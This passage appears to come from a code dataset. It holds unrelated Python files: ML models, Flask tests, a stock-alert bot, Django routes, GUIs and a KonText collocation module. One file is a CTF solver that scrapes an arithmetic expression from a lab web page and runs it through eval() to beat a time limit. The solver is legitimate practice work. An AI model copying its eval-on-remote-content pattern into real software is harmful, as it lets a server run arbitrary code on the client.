self.path_list.append(os.path.join(dir_repeats, file))\n self.label_list.append(0)\n for file in os.listdir(dir_chimeric):\n self.path_list.append(os.path.join(dir_chimeric, file))\n self.label_list.append(1)\n for file in os.listdir(dir_normal):\n self.path_list.append(os.path.join(dir_normal, file))\n self.label_list.append(2)\n for file in os.listdir(dir_junk):\n self.path_list.append(os.path.join(dir_junk, file))\n self.label_list.append(3)\n\n def __len__(self):\n return 2 * len(self.path_list)\n # return len(self.path_list)\n\n def __getitem__(self, idx):\n if idx < len(self.path_list):\n image = Image.open(self.path_list[idx])\n label = self.label_list[idx]\n path = str(self.path_list[idx])\n if self.transform:\n image = self.transform(image)\n sample = {'image': image, 'label': label, 'path': path}\n return sample\n else:\n horizontal_flip = transforms.RandomHorizontalFlip(p=1.0)\n image = Image.open(self.path_list[idx - len(self.path_list)])\n image = horizontal_flip(image)\n label = self.label_list[idx - len(self.path_list)]\n path = str(self.path_list[idx - len(self.path_list)])\n path = path[:-4] + '_flipped' + path[-4:]\n if self.transform:\n image = self.transform(image)\n sample = {'image': image, 'label': label, 'path': path}\n return sample\n","repo_name":"lvrcek/LongReadClassification","sub_path":"pileogram.py","file_name":"pileogram.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5090666959","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport logging\nimport sys\nimport os.path\nimport tqdm\n\nif os.path.abspath('..') not in sys.path:\n sys.path.insert(0, os.path.abspath('..'))\nimport flows\nfrom tendrils import api\n\n\n# --------------------------------------------------------------------------------------------------\nclass TqdmLoggingHandler(logging.Handler):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def emit(self, record):\n try:\n msg = self.format(record)\n tqdm.tqdm.write(msg)\n self.flush()\n except (KeyboardInterrupt, SystemExit): # pragma: no cover\n raise\n except: # noqa: E722, pragma: no cover\n self.handleError(record)\n\n\n# --------------------------------------------------------------------------------------------------\nif __name__ == '__main__':\n\n # Setup logging:\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n console = TqdmLoggingHandler()\n console.setFormatter(formatter)\n logger = logging.getLogger('flows')\n if not logger.hasHandlers():\n logger.addHandler(console)\n logger.setLevel(logging.INFO)\n\n # Do it by status, just to prioritize things a bit:\n for tgtstatus in ('target', 'candidate', 'rejected'):\n targetids = sorted([tgt['targetid'] for tgt in api.get_targets() if tgt['target_status'] == tgtstatus])[\n ::-1]\n\n for targetid in tqdm.tqdm(targetids, desc=tgtstatus):\n donefile = f\"catalog_updates/{targetid:05d}.done\"\n if not os.path.exists(donefile):\n try:\n flows.catalogs.download_catalog(targetid, update_existing=True)\n except:\n logger.exception(\"targetid=%d\", targetid)\n else:\n open(donefile, 'w').close()\n","repo_name":"SNflows/flows","sub_path":"notes/update_all_catalogs.py","file_name":"update_all_catalogs.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"36354581417","text":"import unittest\nimport json\nimport os\nfrom app import app\nfrom flask import Flask\n\nBASE_URL = 'http://127.0.0.1:5000/api/'\nGET_URL ='http://127.0.0.1:5000/api/1'\nUPDATE_URL ='http://127.0.0.1:5000/api/1'\nDELETE_URL ='http://127.0.0.1:5000/api/2'\nclass MyApiTestCase(unittest.TestCase):\n\n def setUp(self):\n self.app = app.test_client()\n self.app.testing = True\n\n def test_todo_creation(self):\n todo = {\n 'title': u'Finish Api',\n 'description': u'Finish this api and submit',\n 'done': False\n }\n response = self.app.post(BASE_URL,\n data=json.dumps(todo),\n content_type='application/json')\n self.assertEqual(response.status_code, 201)\n\n def test_todo_get_all(self):\n response = self.app.get(BASE_URL)\n data = json.loads(response.get_data())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(data['todos']), 2)\n\n def test_todo_get_one(self):\n response = self.app.get(GET_URL)\n data = json.loads(response.get_data())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(data['todo']['title'], 'Finish Api')\n\n def test_todo_update(self):\n todo = {\n 'title': u'Finish Learning',\n 'description': u'Finish this api and submit',\n 'done': False\n }\n response = self.app.put(UPDATE_URL,\n data=json.dumps(todo),\n content_type='application/json')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.get_data())\n self.assertEqual(data['todo']['title'],'Finish Learning')\n\n def test_todo_delete(self):\n response = self.app.delete(DELETE_URL)\n self.assertEqual(response.status_code, 204)\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"Denniskamau/Todo-API","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14023871738","text":"# This is a sample Python script.\nimport json\nimport time\n\nimport requests\nimport schedule\nfrom loguru import logger\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom config import settings\n\nPUSHOVER_API: str = 'https://api.pushover.net/1/messages.json'\nin_stock: bool = False\n\n\ndef check_stock(url: str):\n logger.info(\"checking stock for {item}\", item=item_name(url))\n options = Options()\n options.add_argument('--headless')\n\n # needed for docker, since chrome doesn't like being run as root\n options.add_argument('--no-sandbox')\n options.add_argument('--disable-dev-shm-usage')\n\n browser = webdriver.WebDriver(service=Service(ChromeDriverManager().install()), options=options)\n browser.get(url)\n\n global in_stock\n in_stock = browser.find_element(By.ID, 'AddToCartText-product-template').text != 'SOLD OUT'\n if in_stock:\n logger.info(\"{item} is in stock\", item=item_name(url))\n notify(url)\n\n\ndef notify(url: str):\n data: dict[str, str | int] = {\n 'token': settings.PUSHOVER_API_TOKEN,\n 'user': settings.PUSHOVER_USER_TOKEN,\n 'title': 'JK9 IN STOCK!',\n 'url': url,\n 'message': item_name(url) + ' is in stock',\n 'priority': '2',\n 'expire': ' 10800', # seconds\n 'retry': 30 # seconds\n }\n headers: dict[str, str] = {'Content-type': 'application/json', 'Accept': 'application/json'}\n\n requests.post(PUSHOVER_API, data=json.dumps(data), headers=headers)\n logger.info(\"pushover alert sent for {item}\", item=item_name(url))\n\n\ndef item_name(url: str):\n return url.rsplit('/', 1)[1]\n\n\ndef main():\n logger.debug('app startup')\n schedule.every(1).to(5).minutes.do(\n check_stock,\n 'https://usa.juliusk9.com/collections/bite-pad/products/julius-k9-cotton-nylon-soft-bite-pad'\n )\n while not in_stock:\n schedule.run_pending()\n time.sleep(1)\n\n\nmain()\n","repo_name":"hollanbm/JK9-stock-alerts","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25985384536","text":"## The code might take a while.\r\n\r\nfrom number_theory import sum_factor\r\n\r\nproper_factor = lambda x: sum_factor(x)-x\r\n\r\nlimit = 28123\r\n\r\nabundant = []\r\nfor i in range(limit+2):\r\n if proper_factor(i+1) > (i+1):\r\n abundant.append(i+1)\r\n\r\n#print(abundant) ## abundant is still sorted in this point\r\n\r\nsum_abundant = {}\r\n\r\nfor j in range(len(abundant)):\r\n for k in range(j,len(abundant)):\r\n test = abundant[j]+abundant[k]\r\n if test <= limit:\r\n sum_abundant[test] = sum_abundant.get(test,0)+1\r\nsum_abundant = sorted(list(sum_abundant.keys()))\r\n\r\n#print(sum_abundant) ## list of numbers that can be expressed as sum of 2 AN\r\n\r\n# 28123 is the sum of 2 abundant numbers, the long number below is basically sum of all integers from 1 to 28123, inclusive\r\nans = 395465626 - sum(sum_abundant)\r\nprint(ans)","repo_name":"RussellDash332/Project-Euler","sub_path":"pe-023.py","file_name":"pe-023.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"10042658291","text":"from tkinter import *\nimport os\n\n\nroot = Tk()\ndef oneVone():\n #exec('xo2buttonbind')\n root.destroy()\n os.system('python xo2buttonbind.py')\n\n\n\ndef computer():\n #exec('tictactoe')\n root.destroy()\n os.system('python tictactoe.py')\n #tictactoe.GUI().mainloop()\n\n\nlabel = Label(root, text=\"Hello! Select game mode:\", height=2, font=\"arial 16\")\nlabel.pack()\nbutton1 = Button(root, text=\"1V1\", width=14, font=\"arial 12\", command= oneVone)\nbutton1.pack()\nbutton2 = Button(root, text=\"Against computer\", width=14, font=\"arial 12\", command= computer)\nbutton2.pack()\nroot.mainloop()\n","repo_name":"DaniiarR/Tic-Tac-Toe-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22704768052","text":"from django.urls import path\nfrom .views import (\n api_categories,\n api_conditional_items,\n api_items,\n api_condition,\n api_conditions,\n api_category,\n api_item,\n api_packing_lists,\n api_packing_list_items,\n api_packing_list,\n)\n\nurlpatterns = [\n path(\"categories\", api_categories, name=\"api_categories\"),\n path(\"categories//\", api_category, name=\"api_category\"),\n path(\"items\", api_items, name=\"api_items\"),\n path(\"items//\", api_item, name=\"api_item\"),\n path(\n \"items/conditions//\",\n api_conditional_items,\n name=\"api_conditional_items\",\n ),\n path(\"conditions\", api_conditions, name=\"api_conditions\"),\n path(\"conditions//\", api_condition, name=\"api_condition\"),\n path(\"packing_lists/\", api_packing_lists, name=\"api_packing_lists\"),\n path(\"packing_lists//\", api_packing_list, name=\"api_packing_list\"),\n path(\n \"packing_lists//items/\",\n api_packing_list_items,\n name=\"api_packing_list_items\",\n ),\n]\n","repo_name":"William-pdf/Packed","sub_path":"packing-lists/packed_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18927919362","text":"# coding=utf-8\n\n'''\n\n\n \n \n \n \n \n
    \n 请在2秒内口算结果并提交!
    \n 6630*11586+1309*(6630+11586)=\n \n
    \n \n\n\n'''\n\nimport requests\nimport re\n# get the page\ns = requests.Session()\nurl = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'\nreq = s.get(url)\nprint(req.content)\n\n# get the equation\nnum = re.findall(r'
    \\s+(.*?)=', req.content)[0]\nprint(\"请计算:\"+num)\n\n# calc the result and post\npost1 = {'v': eval(num)}\nreq1 = s.post(url, data=post1)\nprint(req1.content)\n\n\n\n","repo_name":"savior325/ctf_scripts","sub_path":"web/web快速计算.py","file_name":"web快速计算.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"5321025202","text":"import pickle\nimport hashlib\nimport os\nimport time\nfrom typing import List, Any, Optional\nfrom dataclasses import dataclass, field, asdict\n\nimport corplib\nfrom conclib.calc import require_existing_conc\nfrom corplib.errors import MissingSubCorpFreqFile\nfrom bgcalc import freq_calc\nimport settings\nfrom bgcalc.errors import UnfinishedConcordanceError\nfrom translation import ugettext as _\nimport bgcalc\n\nTASK_TIME_LIMIT = settings.get_int('calc_backend', 'task_time_limit', 300)\n\n\n@dataclass\nclass CollCalcArgs:\n \"\"\"\n Collects all the required arguments passed around when\n calculating collocation profiles.\n \"\"\"\n q: List[str]\n user_id: int\n corpname: str\n corpus_encoding: str\n collpage: int\n citemsperpage: int\n save: bool\n cattr: str\n csortfn: str\n cbgrfns: str\n cfromw: int\n ctow: int\n cminbgr: int\n cminfreq: int\n subcname: Optional[str]\n subcpath: List[str] = field(default_factory=list)\n cache_path: Optional[str] = field(default=None)\n samplesize: int = field(default=0)\n\n\nclass CollCalcCache(object):\n\n def __init__(self, corpname, subcname, subcpath, user_id, q, save=0, samplesize=0):\n self._corpname = corpname\n self._subcname = subcname\n self._subcpath = subcpath\n self._user_id = user_id\n self._q = q\n self._save = save\n self._samplesize = samplesize\n\n def _cache_file_path(self, cattr, csortfn, cbgrfns, cfromw, ctow, cminbgr, cminfreq):\n v = f'{self._corpname}{self._subcname}{self._user_id}{\"\".join(self._q)}{cattr}{csortfn}{cbgrfns}{cfromw}{ctow}{cminbgr}{cminbgr}{cminfreq}'\n filename = f'{hashlib.sha1(v.encode(\"utf-8\")).hexdigest()}.pkl'\n return os.path.join(settings.get('corpora', 'colls_cache_dir'), filename)\n\n def get(self, cattr, csortfn, cbgrfns, cfromw, ctow, cminbgr, cminfreq):\n \"\"\"\n Get value from cache.\n\n returns:\n a 2-tuple (cached_data, cache_path) where cached_data is None in case of cache miss\n \"\"\"\n cache_path = self._cache_file_path(cattr=cattr, csortfn=csortfn, cbgrfns=cbgrfns, cfromw=cfromw, ctow=ctow,\n cminbgr=cminbgr, cminfreq=cminfreq)\n if os.path.isfile(cache_path):\n with open(cache_path, 'rb') as f:\n collocs = pickle.load(f)\n else:\n collocs = None\n return collocs, cache_path\n\n\n# TODO !!!! FIX (missing user-id, deprecated handling of MissingSubCorpFreqFile\ndef calculate_colls_bg(coll_args: CollCalcArgs):\n \"\"\"\n Background collocations calculation running on a worker server.\n In case auxiliary data files are needed and not present already\n (MissingSubCorpFreqFile exception), the function triggers\n a respective calculation.\n \"\"\"\n cm = corplib.CorpusManager(subcpath=coll_args.subcpath)\n corp = cm.get_corpus(coll_args.corpname, subcname=coll_args.subcname)\n try:\n # try to fetch precalculated data; if none then MissingSubCorpFreqFile\n corplib.frq_db(corp, coll_args.cattr)\n conc = require_existing_conc(corp=corp, q=coll_args.q)\n if not conc.finished():\n raise UnfinishedConcordanceError(\n _('Cannot calculate yet - source concordance not finished. Please try again later.'))\n collocs = conc.collocs(cattr=coll_args.cattr, csortfn=coll_args.csortfn, cbgrfns=coll_args.cbgrfns,\n cfromw=coll_args.cfromw, ctow=coll_args.ctow, cminfreq=coll_args.cminfreq,\n cminbgr=coll_args.cminbgr, max_lines=conc.size())\n for item in collocs['Items']:\n item['pfilter'] = [('q2', item['pfilter'])]\n item['nfilter'] = [('q2', item['nfilter'])]\n return dict(data=collocs, processing=0, tasks=[])\n except MissingSubCorpFreqFile:\n ans = {'attrname': coll_args.cattr, 'tasks': []}\n out = freq_calc.build_arf_db(corp, coll_args.cattr)\n if type(out) is list:\n processing = 1\n ans['tasks'].extend(out)\n else:\n processing = 0\n ans['processing'] = processing\n ans['data'] = dict(Items=[], Head=[])\n return ans\n\n\n@dataclass\nclass CalculateCollsResult:\n Head: str\n attrname: str\n processing: bool\n lastpage: bool\n Items: List[Any]\n\n\ndef calculate_colls(coll_args: CollCalcArgs) -> CalculateCollsResult:\n \"\"\"\n Calculates required collocations based on passed arguments.\n Result values are cached.\n\n returns:\n a dictionary ready to be used in a respective template (collx.tmpl)\n (keys: Head, Items, cmaxitems, attrname, processing, collstart, lastpage)\n \"\"\"\n collstart = (coll_args.collpage - 1) * coll_args.citemsperpage\n collend = collstart + coll_args.citemsperpage\n cache = CollCalcCache(corpname=coll_args.corpname, subcname=coll_args.subcname, subcpath=coll_args.subcpath,\n user_id=coll_args.user_id, q=coll_args.q, save=coll_args.save,\n samplesize=coll_args.samplesize)\n collocs, cache_path = cache.get(cattr=coll_args.cattr, csortfn=coll_args.csortfn, cbgrfns=coll_args.cbgrfns,\n cfromw=coll_args.cfromw, ctow=coll_args.ctow, cminbgr=coll_args.cminbgr,\n cminfreq=coll_args.cminfreq)\n if collocs is None:\n coll_args.cache_path = cache_path\n app = bgcalc.calc_backend_client(settings)\n res = app.send_task('calculate_colls', args=(coll_args,), time_limit=TASK_TIME_LIMIT)\n # worker task caches the value AFTER the result is returned (see worker.py)\n ans = res.get()\n else:\n ans = dict(data=collocs, processing=0)\n return CalculateCollsResult(\n Head=ans['data']['Head'],\n attrname=coll_args.cattr,\n processing=ans['processing'],\n lastpage=not collstart + coll_args.citemsperpage < len(ans['data']['Items']),\n Items=ans['data']['Items'][collstart:collend]\n )\n\n\ndef clean_colls_cache():\n root_dir = settings.get('corpora', 'colls_cache_dir')\n cache_ttl = settings.get_int('corpora', 'colls_cache_ttl', 3600)\n test_time = time.time()\n all_files = os.listdir(root_dir)\n num_removed = 0\n num_error = 0\n for item in all_files:\n file_path = os.path.join(root_dir, item)\n if test_time - os.path.getmtime(file_path) >= cache_ttl:\n try:\n os.unlink(file_path)\n num_removed += 1\n except OSError:\n num_error += 1\n return dict(total_files=len(all_files), num_removed=num_removed, num_error=num_error)\n","repo_name":"clarinsi/kontext","sub_path":"lib/bgcalc/coll_calc.py","file_name":"coll_calc.py","file_ext":"py","file_size_in_byte":6635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"36603024435","text":"\"\"\"balance table\n\nRevision ID: fc8cb5f0f910\nRevises: c8e0aa159e60\nCreate Date: 2020-03-23 16:51:54.167968\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"fc8cb5f0f910\"\ndown_revision = \"c8e0aa159e60\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_index(op.f(\"ix_balance_balance\"), \"balance\", [\"balance\"], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f(\"ix_balance_balance\"), table_name=\"balance\")\n # ### end Alembic commands ###\n","repo_name":"alexisleveratto/Audit-on-Blockchain","sub_path":"migrations/versions/fc8cb5f0f910_balance_table.py","file_name":"fc8cb5f0f910_balance_table.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"7676760329","text":"import sys\nimport subprocess\nimport torch.nn as nn\nimport torch.nn.functional as F\ntry:\n from torchsummary import summary\nexcept ImportError:\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", 'torchsummary'])\nfinally:\n from torchsummary import summary\n\n\nclass QuizDNN(nn.Module):\n def __init__(self):\n super(QuizDNN, self).__init__()\n\n self.x1 = nn.Sequential(\n nn.Conv2d(3, 64, 3, bias=False, padding=1), # i/p - 32x32\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x2 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 32x32\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x3 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 32x32\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x4 = nn.Sequential(\n nn.MaxPool2d(2, 2), # i/p - 16x16\n )\n\n self.x5 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 16x16\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x6 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 16x16\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x7 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 16x16\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x8 = nn.Sequential(\n nn.MaxPool2d(2, 2), # RF - 8x8\n )\n\n self.x9 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 8x8\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x10 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 8x8\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x11 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 8x8\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x12 = nn.Sequential(\n nn.AdaptiveAvgPool2d(1)\n )\n\n self.x13 = nn.Sequential(\n nn.Linear(64, 10)\n )\n\n def forward(self, x):\n\n x1 = self.x1(x)\n x2 = self.x2(x1)\n x3 = self.x3(x1 + x2)\n x4 = self.x4(x1 + x2 + x3)\n\n x5 = self.x5(x4)\n x6 = self.x6(x4 + x5)\n x7 = self.x7(x4 + x5 + x6)\n x8 = self.x8(x5 + x6 + x7)\n\n x9 = self.x9(x8)\n x10 = self.x10(x8 + x9)\n x11 = self.x11(x8 + x9 + x10)\n\n x12 = self.x12(x11)\n x12 = x12.view(-1, 64)\n\n out = self.x13(x12)\n\n return F.log_softmax(out)\n\n\ndef model_summary(model, input_size):\n print(summary(model, input_size=input_size))\n","repo_name":"namanphy/EVA5","sub_path":"S9/model/QuizDNN.py","file_name":"QuizDNN.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40608084652","text":"import basic_model as bm\nimport data_process_model as dpm\nimport numpy as np\nimport tensorflow as tf\n\n#reshape the dataset for Link_CNN\n#ver 1.0\ndef reshape_dataset(dataset, SPAN):\n input_data = np.zeros((dataset.shape[0], 32, 104, 2))\n temp_data = np.reshape(dataset[:, :6200], (-1, 31, 100, 2))\n input_data[:, :31, 2:102, 0] = temp_data[:, :, :, 0] # cause input size is 32 not 31\n input_data[:, :31, 2:102, 1] = temp_data[:, :, :, 1]\n para_data = dataset[:, 6200:6241]\n\n output_data = dataset[:, 6240 + SPAN[0]].astype(int)\n output_data = dpm.num_to_one_hot(output_data, 3)\n\n return input_data, para_data, output_data\n\n# get the y_pred\ndef inference(input_layer, para_data, train_phase, keep_prob):\n with tf.variable_scope(\"inference\"):\n parameters = []\n # input (N,32,104,2)\n bn_input = bm.batch_norm_layer(input_layer, train_phase, \"bn_input\")\n\n # conv1 (N,16,52,64)\n conv1, filter1 = bm.conv_bn_pool_layer(bn_input, 64, train_phase, \"conv1\")\n parameters[0:0] = filter1\n\n # conv2 (N,8,26,128)\n conv2, filter2 = bm.conv_bn_pool_layer(conv1, 128, train_phase, \"conv2\")\n parameters[0:0] = filter2\n\n # conv3 (N, 4, 13, 256)\n conv3, filter3 = bm.conv_bn_pool_layer(conv2, 256, train_phase, \"conv3\")\n parameters[0:0] = filter3\n\n # flat\n flat_conv3 = tf.reshape(conv3, [-1, 4 * 13 * 256])\n\n # fc layer1(N, 512)\n fc1, fc_weight1 = bm.fc_bn_drop_layer(flat_conv3, 512, train_phase, keep_prob, \"fc1\")\n parameters[0:0] = fc_weight1\n\n #link the para_data\n fc1_link = tf.concat([fc1, para_data], axis=1)\n\n #fc layer2(N,256)\n fc2, fc_weight2 = bm.fc_bn_drop_layer(fc1_link, 256, train_phase, keep_prob, \"fc2\")\n parameters[0:0] = fc_weight2\n\n # score layer\n y_pred, score_weight = bm.score_layer(fc2, 3)\n parameters[0:0] = score_weight\n\n return y_pred, parameters\n\n\n","repo_name":"Freshield/LEARN_TENSORFLOW","sub_path":"20_Project/19_ciena_20spans_data/Link_CNN_model.py","file_name":"Link_CNN_model.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23338688239","text":"#-*-coding:utf8;-*-\n#qpy:3\n#qpy:console\n\nprint(\"This is console module\")\n#网格文字,编码整数在“蚕”中。--\n#1:隔+选\n#2:face>=4\n#证明c3连接同面不同的两边仍是c3\n\n#1:2n:up vtx u:curr i\n# f n u = [n>0][u>=0]sum: C (u+i) i * f (n-1-i) i {i}\n# f 0 u = [u>=0]\n\nimport math as M\n#print(dir(M))\nF = M.factorial\n#C = M.choose\ndef C(n, i):\n if not 0 <= i <= n: return 0\n return F(n)//F(i)//F(n-i)\n\nfd = {}\ndef f(n, u):\n if u < 0: return 0\n if n == 0: return 1\n if n < 0: return 0\n k = n, u\n m = fd.get(k)\n if m is not None: return m\n\n r = sum(C(u+i, i) * f( n-1-i, i) for i in range(0, n))\n fd[k] = r\n return r\ndef ft(n):\n for j in range(n):\n print(j, f(j, 0))\n\nft(10)\nassert [f(j, 0) for j in range(10)] == [1, 1, 2, 4, 9, 22, 57, 154, 430, 1234]\n#http://oeis.org/A287709\n\n\n\n#2:2n:external face o\n# up left face i\n# first edge must be splitted or not, s\n# g n o s = sum: g (n-1) (o-i+4) (not 3 h:\n\t\t\twidth = w_box\n\t\t\theight = int(h_box * (1.0 * h / w))\n\n\t\tif h >= w:\n\t\t\theight = h_box\n\t\t\twidth = int(w_box * (1.0 * w / h))\n\telse:\n\t\twidth = w_box\n\t\theight = h_box\n\n\timg1 = img.resize((width, height), Image.ANTIALIAS)\n\ttkimg = ImageTk.PhotoImage(img1)\n\treturn tkimg\ndef image_label(frame, img, width, height, keep_ratio=True):\n\t\"\"\"输入图片信息,及尺寸,返回界面组件\"\"\"\n\tif isinstance(img, str):\n\t\t_img = Image.open(img)\n\telse:\n\t\t_img = img\n\tlbl_image = tk.Label(frame, width=width, height=height)\n\n\ttk_img = tkimg_resized(_img, width, height, keep_ratio)\n\tlbl_image.image = tk_img\n\tlbl_image.config(image=tk_img)\n\treturn lbl_image\n\n\ndef show_confirm(message=\"\"):\n\t\"\"\"\n\t\tTrue : yes\n\t\tFalse : no\n\t\"\"\"\n\treturn messagebox.askyesno(\"确认框\", message)\n\n\n\na=None\ndef main():\n window = tk.Tk() # 创建窗口\n window.geometry(\"700x400\") # 窗体尺寸设置\n window.iconbitmap(\"Money.ico\") # 窗体左上角图标设置\n window.title(\"机械臂抓取控制界面\")\n window.resizable(True, True) # 设置窗体不可改变大小\n\n #背景图选择并放置\n img=ImageTk.PhotoImage(file=\"bg1.png\")\n canvas = tk.Canvas(window, width=1000, height=800)\n canvas.create_image(300, 200, image=img)\n canvas.pack(expand=tk.YES, fill=tk.BOTH)\n\n def show_title(self): #窗口边框消失、复原函数\n global a\n a=not a\n window.overrideredirect(a)\n def close(self): #窗口退出函数\n if show_confirm(\"确认退出吗 ?\"):\n window.quit()\n\n\n #**************************标题设置开始处*****************************\n f1 = tk.Frame(canvas)\n #图像按钮 1\n im1 = image_label(f1, \"laugh.jpg\", 86, 86, False)\n im1.configure(bg=\"Teal\")\n im1.bind('',show_title)\n im1.pack(side=tk.LEFT, anchor=tk.NW, fill=tk.Y)\n #标题背景、字体......\n ft1 = tkFont.Font(family=\"微软雅黑\", size=24, weight=tkFont.BOLD)\n tk.Label(f1, text=\"欢迎来到机械臂控制界面\", height=2, fg=\"white\", font=ft1, bg=\"Teal\") \\\n .pack(side=tk.LEFT, expand=tk.YES, fill=tk.X)\n #图像按钮 2\n im2 = image_label(f1, \"close.png\", 86, 86, False)\n im2.configure(bg=\"Teal\")\n im2.bind('',close)\n im2.pack(side=tk.RIGHT, anchor=tk.NW, fill=tk.Y)\n\n f1.pack(fill=tk.X)\n #**************************标题设置结束*****************************\n\n# ---------------------------------------------------------------------\n# 两个功能按钮组的设置\n# ---------------------------------------------------------------------\n\n # ‘手动抓取’和‘自动抓取’功能按钮所调用的函数\n def shou_dong():\n Wd_1()\n def zi_dong():\n Wd_2()\n # 子窗口一\n def Wd_1():\n Wd=tk.Toplevel()\n Wd.geometry(\"%dx%d\" % (800,620)) # 窗体尺寸\n Wd.title(\"手动抓取界面\") # 窗体标题\n Wd.grab_set()\n Wd.resizable(True, True)\n\n frame = tk.Frame(Wd, height=20,bg=\"Goldenrod\")\n ft0 = tkFont.Font(family=\"微软雅黑\", size=18, weight=tkFont.BOLD)\n tk.Label(frame, font=ft0, bg=\"Chocolate\", fg=\"white\", text=\"请手动调控机械臂的各个舵机参数\") \\\n .pack(padx=20)\n frame.pack(fill=tk.X)\n\n ft1 = tkFont.Font(family=\"微软雅黑\", size=12, weight=tkFont.BOLD)\n ft2 = tkFont.Font(family=\"微软雅黑\", size=14, weight=tkFont.BOLD)\n\n #右边绿框(画布形式)\n canvas = tk.Canvas(frame, bg='green', height=238, width=450)\n # 定义多边形参数,然后在画布上画出指定图形\n x0, y0, x1, y1 = 100, 100, 150, 150\n line = canvas.create_line(x0 - 50, y0 - 50, x1 - 50, y1 - 50) # 画直线\n oval = canvas.create_oval(x0 + 120, y0 + 50, x1 + 120, y1 + 50, fill='yellow') # 画圆 用黄色填充\n arc = canvas.create_arc(50, 150, 100, 200, start=0, extent=180,fill='red') # 画扇形 从0度打开收到180度结束\n rect = canvas.create_rectangle(330, 30, 330 + 20, 30 + 20,fill='blue') # 画矩形正方形\n triangle = canvas.create_polygon(208,135,222,43,268,95,fill='DeepPink')\n\n canvas.pack(side=tk.RIGHT,anchor=tk.N)\n\n\n #舵机一框区\n v_1 = tk.StringVar()\n v_2 = tk.StringVar()\n v_3 = tk.StringVar()\n v_4 = tk.StringVar()\n v_5 = tk.StringVar()\n v_6 = tk.StringVar()\n\n f_dj1 = tk.Frame(frame)\n tk.Label(f_dj1, font=ft2, text=\"一号舵机:\").pack(side=tk.LEFT, anchor=tk.W, padx=10)\n f_dj1.pack(fill=tk.Y, anchor=tk.W, pady=5)\n p_dj1 = tk.Spinbox(f_dj1, from_=0, to=300, width=19,textvariable=v_1, font=ft1)\n p_dj1.pack(side=tk.LEFT, padx=10)\n # 舵机二框区\n f_dj2 = tk.Frame(frame)\n tk.Label(f_dj2, font=ft2, text=\"二号舵机:\").pack(side=tk.LEFT, anchor=tk.W, padx=10)\n f_dj2.pack(fill=tk.Y, anchor=tk.W, pady=5)\n p_dj2 = tk.Spinbox(f_dj2, from_=0, to=300, width=19,textvariable=v_2, font=ft1)\n p_dj2.pack(side=tk.LEFT, padx=10)\n # 舵机三框区\n f_dj3 = tk.Frame(frame)\n 